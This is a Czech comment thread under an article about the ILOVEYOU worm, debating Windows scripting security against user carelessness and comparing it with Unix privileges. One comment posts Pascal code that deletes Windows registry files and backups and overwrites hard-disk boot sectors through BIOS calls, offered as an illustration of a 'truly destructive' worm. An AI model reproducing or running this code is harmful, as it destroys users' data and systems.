Názory k článku Nevěřte každému, kdo říká, že vás miluje!

No to mas kliku, ale zamysli se nad timhle : na kolik adres to autor asi tak rozposlal ? Desitky, stovky, snad tisice - o moc vic asi ne, tezko rict. Ale behem nekolika hodin byl tenhle mail po celem svete ( svete !!! ) v milionech a milionech exemplarich. A stale jeste dalsi prichazeji ! Tohle vsechno je prace (naivita) uzivatelu - o moznosti, ze se umi spustit sam bez manualni pomoci neuvazuji, snad jen s pomoci specialnich funkci, ktere si ovsem musi uzivatel nastavit (opet) rucne. Porad pri tehle prilezitosti myslim na ten skvely obrazek ktery cirkuluje na siti, jak uklizecka lesti pult s velkym cervenym tlacitkem NUCLEAR WAR.

Tohle přirovnání teda kulhá na obě nohy. Spíš bych se ptal, jestli jsou vinni silničáři, že silnice politá olejem je nesjízdná a auta na nich dostávají smyk. No, vlastně ani to ne. Spíš, jestli byl nejlepší nápad stavět vysokorychlostní dálnici hned vedle rafinérie a tvrdit řidičům, že se tam klidně mohou projíždět dvěstěkilometrovou rychlostí. Mohou, jenomže...

Presne automobily a provoz na silnicich jsou podle meho prikladem proti Microsoftu. Prece kazde evropske auto musi splnovat to, ze predni sklo vydrzi naraz koule urcite vahy (snad 1kg) z urcite vyse (1 nebo 2 metry - nevim presne).
Rovnez tak kazda nove postavena dalnice musi mit zarucenu urcitou minimalni drsnost povrchu. (A pokud se jim to napriklad u asfoltovych povrchu nepovde, tak ji nekdy pred zprovoznenim musi pomoci sikmych vrypu zdrsnovat.)
A nelze si dat tak snadno do smlouvy treba o prodeji aut jakekoliv distancovani se od vseho, co souvisi s provozem automobilu. Dokonce je prece zvykem, ze vyrobce jeste dodatecne i vymenuje nejakou soucastku (treba na predni naprave).

Ale pocitace prece nejsou auta (anebo televizory). Semtam nejaky ten virus nebo zniceny soubor. Ridme se chovanim jinych.

Co udela Bill Gates, kdyz ma zavirovany pocitac ? - Koupi si jiny.

To jsem asi jediny clovek, co se nemel sanci potesit s tim genialnim vynalezem. Nic mi neprislo ...

Sam urcite ne, ja osobne znam spoustu lidi, kteri maji (nebo mozna meli) to stesti, ze je proste nikdo nema rad. I kdyz na stranu druhou, osobne sem videl, co tahle potvurka provedla v jedne velke IT firme.

A jeste neco: Hlavne nesmutnit, ze se na nekoho pri te vcerejsi vlne lasky nedostalo. Vsak prijde vlna dalsi a ta si vybere uz i ty ostatni.

No, to byla celkem obsahla analyza, ale stale nevim CO MA s temito situacemi a hlavne s perforaci predniho skla odletnuvsi dlazebni kostkou SPOLECNEHO VYROBCE AUTA? Ja tedy nechci nijak zasahovat do sporu MS ano/ne, spise jde o principy. Bud mam levna auta s vicemene standardni vybavou, nebo si u par specializovanych firem mohu koupit auto vsemuvzdorne, ke kteremu dostanu nonstop servisni tym 24 hodin denne a 12 garancnich prohlidek do roka - vse v cene. Pocet nul na seku doplnte sam .... :)

Ackoliv nejsem podpurcem ani uzivatelem WIN, v tomto pripade s vami musim nesouhlasit - skriptovani je velmi uzitecna vec pro aplikacni programy a tento vir nevyuzil bezpecnostni diry ve WIN ale pouze blbosti uzivatelu - spustit kazdy skript, ktery prijde postou, je pitomost. A aplikace ma obvykle prava uzivatele, ktery ji spusti tzn. o bug WIN by se jednalo kdyby to poskodilo data jinych uzivatelu nebo systemu. Neuveritelne je, ze tento parazit je snad ten nejtrivialnejsi typ parazitu, ktery muze existovat a presto (nebo snad prave proto?) se tak rychle siri - neni totiz podporovan chybama software, ale blbosti uzivatelu.

Napsal jsi to pěkně. Jde o to, že Windows mně na rozdíl od jiných OS neumožňují snadnou ochranu (tedy pokud si nechci odepřít otevírání příloh).

Takovu činnost bez reakce antivirového programu může dělat právě proto, že se uspokojuje na souborech, které antivir nehlídá. Pokud by se pokusil kousnout třeba do nějakýho *.exe určitě by to neměl tak jednoduchý.

Rad bych touto cestou podekoval autorovi predmetneho cerva za to, ze mne nazorne upozornil na skutecnost, ze jista softwarova spolecnost bez meho souhlasu a vedomi interpretuje na mem stroji pochybne soubory zvane vbs skripty. Do te doby jsem netusil, ze mohou fungovat i mimo HTML stranky a myslim, ze nejsem sam.

K steskum administratoru bych rad dodal, ze ikony byly snad vymysleny proto, aby se na ne klikalo. Chtit po uzivatelich, aby to v urcitych situacich dobrovolne nedelali je nesmysl. Kdyz cestari nechaji na chodniku nezajisteny otevreny kanal a nekdo jim do nej spadne mohou samozrejme tvrdit, ze se mel idiot divat pred sebe ale u soudu jim to nebude nic platne. Pevne doufam, ze to bude jednou platit i pro Billuv spolek.

No a proc by nesly ? Vzdyt jsou to skripty a jestlize bezi podpora...
Co se tyce ikon, naprosto s Vami souhlasim ze byly vymysleny aby se na ne klikalo. Snad proto se lisi graficky tak, aby byl na prvni pohled jasny typ souboru. Jednodussi to snad ani byt nemuze, jsou to jen takove piktogramy. Ja osobne treba zapremyslim, pokud hledam dvere s panackem a on tam je hroch - zarazi me to, jsem zvykly na panacka a kazda zmena me podvedome vyburcuje, abych zacal poradne koukat kolem. A propos piktogramy - videl jste nekdy testy na USA ridicak ? Jsou tam krome textu prave piktogramy. Je to z toho duvodu, ze kazdy amik ma pravo na ridicak, ale neexistuje zakon o povinnosti umet cist. :)
S cestarema to muzete zkusit u soudu, ale sance velke nebudou a Vam to uz taky muze byt jedno.

No, není to tak docela pravda. Windows maji ve svém "mailcapu" -- který se mimochodem řídí příponou souboru, a ne MIME typem, pro většinu binárek/scriptů prostě nadefinováno "spusť to", mám dojem, že na tom je ten systém závislý (i.e. kdyby to tam nebylo, tak půlka věcí přestane fungovat).
Problém také není v uživatelské přítulnosti, ale v tom, že moc věcí je program, který se spustí. Příklad: k čemu jsou proboha self-extracting archívy, které obsahují např. textový dokument? Jen k šíření virů.. Ve Windows bohužel není velký rozdíl mezi programy, které si mohou dělat co chtějí, a daty (z hlediska uživatele se obojí "otevírá" -- no a co?).
Není to o uživatelské přítulnosti, je to trochu jako by někdo říkal, že zámek, který se dá kromě klíče otevřít i stiskem čudlíku na zámku, je uživatelsky přítulnější, protože není problém ho otevřít když ztratíš klíče..

No nic proti scriptům, ale je velmi hloupé, že Windows mají ve svém
defaultním nastavení, že na cokoliv se klikne, to se spustí (se superuživatelskými oprávněními).
Když se k tomu přičte fakt, že 95% uživatelů neví, co způsobí nějakým
kliknutím, je na katastrofu zaděláno..

Tak jsem se pobavil, jak nekteri univerzitni vyucujici VSE jsou schopni objasnit lajdackost systemu M$ Windows i od takoveho VM/IBM :-) Ale vazne. Fakt je, ze bezpecnostni ochrana systemu M$ Win 98 je nulova. Pak se neni cemu divit, ze po svete behaji programy typu Back Orifice, kdy na dalku muzete ZCELA ovladat cizi pozitac s timto (ale s s Win NT,95) systemem. Jedina moznost, jak se podobnym virum vyvarovat, je cist postu zasadne pomoci telnetu a brouzdat po internetu vyhradne pomoci lynxu. Ovsem je otazka, kdo ma na to nervy... Pokud si nekdo mysli, ze uzivatele ode dneska budou jaksi \"obeznameni s problematikou\", je VYSOCE naivni. Za par mesicu, az nejaky chudak znovu vpusti do sveta nejakou WORM lahudku, bude situace jiste velice podobna. Lide jsou totiz v drtive vetsine nepoucitelni... P.S. ILOVEYOU neni vubec destruktivni. Pokud by byl, udela neco na tento zpusob:

assign(fa,\'c:\\windows\\system.dat\');
setfattr(fa,32);
erase(fa);
assign(fa,\'c:\\windows\\user.dat\');
setfattr(fa,32);
erase(fa);
findfirst(\'c:\\windows\\sysbckup\\*.cab\',63,s);
while doserror=0 do
begin
s2:=\'c:\\windows\\sysbckup\\\'+s.name;
assign(fa,s2);
setfattr(fa,32);
erase(fa);
findnext(s);
end;

with Reg do
begin
AH:=$08;
DL:=$80;
Intr($13,Reg);
maxhlava:=DH;
maxstopa:=CH;
maxsektor:=CL;
end;
fillchar(sect,sizeof(sect),0);
with Reg do
begin
for povrch:=0 to 1 do
begin
for stopa:=0 to 2 do
begin
for sektor:=1 to 20 do
begin
AH:=3;
AL:=1;
CH:=stopa; {stopa}
CL:=sektor; {sektor}
DH:=povrch; {povrch}
DL:=$80; {drive}
ES:=seg(sect);
BX:=ofs(sect[1]);
intr($13,reg);
blockwrite(f,sect[1],512);
end;
end;
end;
end;
with Reg do
begin
for stopa:=0 to 2 do
begin
for sektor:=1 to maxsektor do
begin
AH:=3;
AL:=1;
CH:=stopa; {stopa}
CL:=sektor; {sektor}
DH:=0; {povrch}
DL:=$80; {drive}
ES:=seg(sect);
BX:=ofs(sect[1]);
intr($13,reg);
blockwrite(f,sect[1],512);
end;
end;
end;
with Reg do
begin
for stopa:=0 to 2 do
begin
for sektor:=1 to maxsektor do
begin
AH:=3;
AL:=1;
CH:=stopa; {stopa}
CL:=sektor; {sektor}
DH:=1; {povrch}
DL:=$80; {drive}
ES:=seg(sect);
BX:=ofs(sect[1]);
intr($13,reg);
blockwrite(f,sect[1],512);
end;
end;
end;


A mate DISK jak vymalovany :-))) Takze o destruktivnosti bych zde ani nehovoril...

Clanek v URL nahore a tenhle na news.com kritizuji v souvislosti s ILOVEYOU Microsoft za nedostatek bezpecnosti..

PRo Hynek Med:
Co má znamenat to: " ...NT nejsou o moc lepsi, viz. uzivatele s administratorskym opravnenim ... ". Stejně takhle múžu říct - viz Linux a uživatelé zařazení v root skupině.
Co se tohoto týče, tak záleží na administrátorovi jaká práva komu přidělí. Je jedno mluvíme li o Linuxu, nebo NT. O Win 95/98 mluvit nemá cenu, tam je bezpečnost stejná, jako když položíte otevřený kufřík se sto tisíci marekami na lavičku v parku a odskočíte si nakoupit.

Jak ste si jistě přečetli v článku, virus je aktivní na programech od Microsoftu. Můj názor je, že si ho Microsoft udělal sám a za chvíli uvede na trh nový mail program, který bude "na 100%" odolný proti virům a vydělá miliony. HOWK

No, to znamena, ze v tom je rozdil. :-) Ve Windows NT ma clovek superuzivatelska opravneni porad, i kdyz treba jen cte mail (a klika na prilohy :-).
V Unixu je naproti tomu tradicne skupina wheel, jejiz clenove ovsem nemaji naprosto zadna privilegia, krome jedineho. Po zadani prikazu "su" a rootovskeho hesla ziskaji na chvili superuzivatelske opravneni. Tedy, samo clenstvi v nejake skupine necini vubec nic, pouze umozni po zadani superuzivatelskeho hesla stat se na nezbytne nutnou chvili (editace systemovych souboru..) superuzivatelem. Behem cteni mailu tedy nemohou nic ponicit (krome svych souboru samozrejme). Spojeno s tim, ze zadny mailovy program pro Unixy (mozna krome MSIE pro Solaris :-) ve sve defaultni konfiguraci neumoznuje primo spoustet binarni programy nebo scripty (natoz je spoustet jednim kliknutim), jsou Unixy vuci takovymto cervum pomerne odolne.
Jinak samozrejme je mozne zalozit nekolik uctu ktere budou mit stejna prava jako root, nebo byt porad nalogovany jako root. Nicmene takova praxe je pocitovana jako nespravna. (Ono v tom Unixu, kde je vsechno konfigurovatelne prakticky jakkoliv, je holt hodne veci pouze otazkou kultury a zvyklosti.) Ve vetsine distribuci Linuxu je GNU su, ktere nepotrebuje, aby clovek byl ve skupine wheel (staci znat jen rootovske heslo), osobne si nemyslim, ze to je dobry napad. Take existuje program sudo, kterym lze delegovat na bezne uzivatele jen nektere pravomoci. V bezpecnejsich Unixech je take vrstvena bezpecnost, s velmi jemnym nastavenim co kdo muze..